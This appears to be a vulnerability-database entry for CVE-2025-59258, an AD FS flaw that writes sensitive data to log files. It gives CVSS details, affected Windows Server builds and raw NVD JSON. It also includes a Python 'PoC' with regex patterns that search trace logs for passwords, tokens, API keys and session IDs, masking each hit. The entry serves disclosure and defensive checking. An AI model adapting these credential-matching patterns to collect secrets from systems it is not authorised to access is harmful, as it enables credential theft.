Security Vulnerability Report
CVE-2025-59258 CVSS 6.2 MEDIUM

CVE-2025-59258

Published: 2025-10-14 17:16:08
Last Modified: 2025-10-20 19:49:17

Description

Insertion of sensitive information into log file in Active Directory Federation Services allows an unauthorized attacker to disclose information locally.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:* - VULNERABLE
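Microsoft Active Directory Federation Services (see the Microsoft security advisory for the specific affected versions). The Raw JSON Data section below additionally lists windows_server_2022_23h2 and windows_server_2025 as vulnerable and gives per-build version bounds for Windows Server 2016 and later.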

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
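# CVE-2025-59258 PoC - AD FS Sensitive Information Disclosure via Log Files
# This PoC demonstrates how to search for sensitive information in AD FS log files
#
# Matched values are masked before they are stored or printed, so running the
# check does not itself copy secrets into a terminal, scrollback buffer or any
# captured output (which would repeat the CWE-532 problem being checked for).
import itertools
import os
import re
import sys

# Default trace directory used by this script; pass another path as argv[1].
DEFAULT_LOG_DIR = "C:\\ProgramData\\Microsoft\\ADFS\\Trace"

# File suffixes that are inspected.
# NOTE(review): .etl files are binary ETW traces; reading them as text is
# best-effort only, so a clean result for an .etl file is not proof of absence.
_LOG_SUFFIXES = ('.log', '.txt', '.etl')

# Upper bound on reported hits per pattern per file, to keep the report short.
_MAX_HITS_PER_PATTERN = 5

# (compiled pattern, label) pairs. Group 2 of every pattern is the value that
# looks sensitive; it is only ever measured, never kept.
_SENSITIVE_PATTERNS = [
    (re.compile(r'(?i)(token|jwt|saml)\s*[:=]\s*([A-Za-z0-9_\-\.]{20,})'), 'Authentication Token'),
    (re.compile(r'(?i)(password|passwd|pwd)\s*[:=]\s*(\S+)'), 'Password'),
    (re.compile(r'(?i)(secret|api[_-]?key)\s*[:=]\s*(\S+)'), 'Secret/API Key'),
    (re.compile(r'(?i)(certificate|cert)\s*[:=]\s*([A-Za-z0-9+/=]{20,})'), 'Certificate Data'),
    (re.compile(r'(?i)(session[_-]?id|sid)\s*[:=]\s*([A-Za-z0-9\-]{10,})'), 'Session ID'),
    (re.compile(r'(?i)(bearer)\s+([A-Za-z0-9_\-\.]{20,})'), 'Bearer Token'),
]


def _mask(value):
    """Return a placeholder that records only the length of *value*."""
    return f"<redacted, {len(value)} chars>"


def _scan_file(file_path):
    """Return masked findings for one log file (may raise OSError)."""
    with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
        content = f.read()

    hits = []
    for pattern, info_type in _SENSITIVE_PATTERNS:
        for m in itertools.islice(pattern.finditer(content), _MAX_HITS_PER_PATTERN):
            hits.append({
                'file': file_path,
                'type': info_type,
                # Masked on purpose: the report says where to look, not what
                # the secret is.
                'data': _mask(m.group(2)),
                # 1-based line of the match start, for triage in the log file.
                'line': content.count('\n', 0, m.start()) + 1,
            })
    return hits


def search_adfs_logs(log_directory=DEFAULT_LOG_DIR):
    """
    Search for sensitive information in AD FS log files.

    This demonstrates the information disclosure vulnerability where
    sensitive data is written to log files accessible to local users.

    Args:
        log_directory: Directory that is walked recursively for files ending
            in .log, .txt or .etl.

    Returns:
        A list of dicts with the keys 'file' (path), 'type' (pattern label),
        'data' (masked placeholder carrying only the value's length) and
        'line' (1-based line number of the match). At most five hits are
        reported per pattern per file. Unreadable files are reported on
        stdout and skipped.
    """
    findings = []

    # Check AD FS trace log directory
    if os.path.isdir(log_directory):
        print(f"[*] Scanning AD FS log directory: {log_directory}")
        for root, _dirs, files in os.walk(log_directory):
            for file_name in files:
                if not file_name.endswith(_LOG_SUFFIXES):
                    continue
                file_path = os.path.join(root, file_name)
                try:
                    findings.extend(_scan_file(file_path))
                except PermissionError:
                    # A denied read is the expected outcome on a host whose
                    # log directory is already locked down.
                    print(f"[!] Permission denied: {file_path}")
                except OSError as e:
                    print(f"[!] Error reading {file_path}: {e}")
    else:
        print(f"[-] AD FS log directory not found: {log_directory}")

    # Also check Windows Event Logs for AD FS events
    print("\n[*] Check Windows Event Viewer for AD FS/AD FS Tracing logs")
    print(" Event sources: AD FS, AD FS Tracing, ADFS-Proxy")

    return findings


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-59258 - AD FS Log Information Disclosure PoC")
    print("=" * 60)

    log_dir = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_LOG_DIR
    results = search_adfs_logs(log_dir)

    if results:
        print(f"\n[!] Found {len(results)} potential sensitive information entries:")
        for r in results:
            print(f" File: {r['file']}")
            print(f" Line: {r['line']}")
            print(f" Type: {r['type']}")
            print(f" Data: {r['data']}")
            print()
        # Follow-up for the host owner; the vendor advisory is
        # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59258
        print("[*] Treat values at these locations as exposed: rotate them, apply the")
        print("    vendor update, and restrict read access to the log directory.")
    else:
        print("\n[-] No sensitive information found in accessible log files.")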

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59258", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:08.463", "lastModified": "2025-10-20T19:49:17.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of sensitive information into log file in Active Directory Federation Services allows an unauthorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": 
true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59258", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}